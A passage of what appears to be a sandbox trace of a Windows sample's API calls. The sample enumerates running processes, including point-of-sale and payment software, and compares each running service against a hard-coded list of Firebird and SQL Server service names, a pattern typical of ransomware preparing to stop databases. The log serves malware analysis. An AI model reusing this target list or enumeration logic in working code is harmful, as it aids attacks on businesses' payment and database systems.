hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0180.991] lstrlenW (lpString="webdrive.exe") returned 12 [0180.991] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0180.992] lstrlenW (lpString="whatsapp.exe") returned 12 [0180.992] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0180.993] lstrlenW (lpString="winscp.exe") returned 10 [0180.993] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0180.994] lstrlenW (lpString="yahoomessenger.exe") returned 18 [0180.994] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0180.995] lstrlenW (lpString="active-charge.exe") returned 17 [0180.995] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0180.996] lstrlenW (lpString="accupos.exe") returned 11 [0180.996] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0180.997] lstrlenW (lpString="afr38.exe") returned 9 [0180.997] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0181.005] lstrlenW (lpString="aldelo.exe") returned 10 [0181.006] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0181.006] lstrlenW (lpString="ccv_server.exe") returned 14 [0181.007] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0181.008] lstrlenW (lpString="centralcreditcard.exe") returned 21 [0181.008] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0181.009] lstrlenW (lpString="creditservice.exe") returned 17 [0181.009] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0181.010] lstrlenW (lpString="edcsvr.exe") returned 10 [0181.010] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0181.010] lstrlenW (lpString="fpos.exe") returned 8 [0181.011] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0181.011] lstrlenW (lpString="isspos.exe") returned 10 [0181.012] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0181.012] lstrlenW (lpString="mxslipstream.exe") returned 16 [0181.013] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1010, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0181.073] lstrlenW (lpString="omnipos.exe") returned 11 [0181.073] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0181.074] lstrlenW (lpString="spcwin.exe") returned 10 [0181.074] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0181.075] lstrlenW (lpString="spgagentservice.exe") returned 19 [0181.075] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0181.077] lstrlenW (lpString="utg2.exe") returned 8 [0181.077] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1060, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_community.exe")) returned 1 [0181.078] lstrlenW (lpString="lb_community.exe") returned 16 [0181.078] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="miniature.exe")) returned 1 [0181.079] lstrlenW (lpString="miniature.exe") returned 13 [0181.079] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="humanity-volumes-enables.exe")) returned 1 [0181.080] lstrlenW (lpString="humanity-volumes-enables.exe") returned 28 [0181.080] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operation-environments.exe")) returned 1 [0181.081] lstrlenW (lpString="operation-environments.exe") returned 26 [0181.081] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0181.081] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0181.082] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0181.082] lstrlenW (lpString="taskhostw.exe") returned 13 [0181.082] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0181.083] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0181.083] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0181.084] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0181.084] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x12b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0181.085] lstrlenW (lpString="conhost.exe") returned 11 [0181.085] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0181.086] lstrlenW (lpString="sppsvc.exe") returned 10 [0181.086] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0181.087] lstrlenW (lpString="dllhost.exe") returned 11 [0181.087] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0181.088] lstrlenW (lpString="wdgmug.exe") returned 10 [0181.088] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1260, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0181.089] lstrlenW (lpString="cmd.exe") returned 7 [0181.089] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1160, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0181.089] lstrlenW (lpString="conhost.exe") returned 11 [0181.089] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x764, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0181.090] lstrlenW (lpString="sc.exe") returned 6 [0181.090] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x764, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0181.091] lstrlenW (lpString="conhost.exe") returned 11 [0181.091] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0181.092] lstrlenW (lpString="WMIADAP.exe") returned 11 [0181.092] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0181.093] lstrlenW (lpString="LogonUI.exe") returned 11 [0181.093] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0 [0181.093] CloseHandle (hObject=0x354) returned 1 [0181.093] Sleep (dwMilliseconds=0x1f4) [0182.280] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x74ecf0 [0182.282] EnumServicesStatusExW (in: hSCManager=0x74ecf0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 0 [0182.283] GetLastError () returned 0xea [0182.283] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1d8a) returned 0x773a68 [0182.283] EnumServicesStatusExW (in: hSCManager=0x74ecf0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x773a68, cbBufSize=0x1d8a, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x773a68, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 1 [0182.285] CloseServiceHandle (hSCObject=0x74ecf0) returned 1 [0182.285] lstrlenW (lpString="Appinfo") returned 7 [0182.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0182.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0182.285] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0182.285] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0182.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0182.285] lstrlenW (lpString="AppXSvc") returned 7 [0182.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0182.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0182.285] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0182.285] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0182.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0182.286] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0182.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0182.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0182.286] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0182.286] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0182.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0182.286] lstrlenW (lpString="Audiosrv") returned 8 [0182.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0182.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0182.286] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0182.286] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0182.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0182.286] lstrlenW (lpString="BFE") returned 3 [0182.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0182.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0182.286] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0182.286] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0182.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0182.286] lstrlenW (lpString="BITS") returned 4 [0182.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0182.286] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0182.286] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0182.286] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0182.286] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0182.286] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0182.286] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0182.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0182.287] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0182.287] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0182.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0182.287] lstrlenW (lpString="CDPSvc") returned 6 [0182.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0182.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0182.287] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0182.287] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0182.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0182.287] lstrlenW (lpString="ClickToRunSvc") returned 13 [0182.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0182.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0182.287] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0182.287] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0182.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0182.287] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0182.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0182.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0182.287] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0182.287] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0182.287] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0182.287] lstrlenW (lpString="CryptSvc") returned 8 [0182.287] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0182.287] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0182.287] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0182.287] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0182.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0182.288] lstrlenW (lpString="DcomLaunch") returned 10 [0182.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0182.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0182.288] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0182.288] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0182.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0182.288] lstrlenW (lpString="Dhcp") returned 4 [0182.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0182.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0182.288] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0182.288] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0182.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0182.288] lstrlenW (lpString="Dnscache") returned 8 [0182.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0182.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0182.288] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0182.288] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0182.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0182.288] lstrlenW (lpString="DoSvc") returned 5 [0182.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0182.288] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0182.288] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0182.288] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0182.288] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0182.288] lstrlenW (lpString="DPS") returned 3 [0182.288] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0182.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0182.289] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0182.289] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0182.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0182.289] lstrlenW (lpString="DusmSvc") returned 7 [0182.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0182.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0182.289] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0182.289] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0182.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0182.289] lstrlenW (lpString="EventLog") returned 8 [0182.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0182.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0182.289] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0182.289] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0182.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0182.289] lstrlenW (lpString="EventSystem") returned 11 [0182.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0182.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0182.289] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0182.289] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0182.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0182.289] lstrlenW (lpString="FontCache") returned 9 [0182.289] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0182.289] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0182.289] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0182.289] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0182.289] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0182.290] lstrlenW (lpString="gpsvc") returned 5 [0182.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0182.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0182.290] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0182.290] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0182.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0182.290] lstrlenW (lpString="iphlpsvc") returned 8 [0182.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0182.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0182.290] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0182.290] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0182.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0182.290] lstrlenW (lpString="KeyIso") returned 6 [0182.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0182.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0182.290] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0182.290] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0182.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0182.290] lstrlenW (lpString="LanmanServer") returned 12 [0182.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0182.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0182.290] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0182.290] lstrcmpiW 